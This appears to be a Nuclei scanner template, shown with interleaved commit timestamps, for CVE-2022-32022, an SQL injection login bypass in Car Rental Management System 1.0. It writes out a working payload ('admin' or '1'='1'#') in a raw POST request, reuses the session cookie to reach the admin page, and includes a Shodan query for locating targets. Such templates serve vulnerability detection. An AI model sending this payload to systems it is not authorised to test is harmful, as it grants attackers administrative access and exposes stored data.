2022-07-31 21:05:13 +00:00
id : CVE-2022-32022
info :
2022-09-29 13:38:41 +00:00
name : Car Rental Management System 1.0 - SQL Injection
2022-07-31 21:05:13 +00:00
author : arafatansari
2022-09-29 13:52:24 +00:00
severity : high
2022-07-31 21:05:13 +00:00
description : |
2022-09-29 13:38:41 +00:00
Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/ajax.php?action=login. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-07-31 21:05:13 +00:00
reference :
2022-08-02 06:52:12 +00:00
- https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-32022
2022-09-29 13:52:24 +00:00
- https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md.
2022-08-02 10:10:24 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score : 7.2
cve-id : CVE-2022-32022
cwe-id : CWE-89
2022-07-31 21:05:13 +00:00
metadata :
shodan-query : http.html:"Car Rental Management System"
2022-08-02 10:10:24 +00:00
verified : "true"
2022-08-02 09:28:16 +00:00
tags : cve,cve2022,carrental,cms,sqli,login-bypass
2022-07-31 21:05:13 +00:00
requests :
- raw :
- |
POST /admin/ajax.php?action=login HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
username=admin'+or+'1'%3D'1'%23&password=admin
2022-08-02 06:52:12 +00:00
- |
GET /admin/index.php?page=home HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
2022-07-31 21:05:13 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-08-02 06:52:12 +00:00
- 'Welcome back Administrator!'
- 'action=logout'
- 'Manage Account'
condition : and
2022-07-31 21:05:13 +00:00
- type : status
status :
- 200
2022-09-29 13:38:41 +00:00
# Enhanced by mp on 2022/09/28